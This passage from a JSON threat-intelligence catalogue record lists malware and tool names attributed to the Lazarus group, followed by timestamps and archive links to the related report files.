"Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434653, "ts_updated_at": 1775792300, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/a3b6bbd6f3466af0804e0ff6857529171728d88a.pdf", "text": "https://archive.orkl.eu/a3b6bbd6f3466af0804e0ff6857529171728d88a.txt", "img": "https://archive.orkl.eu/a3b6bbd6f3466af0804e0ff6857529171728d88a.jpg" } }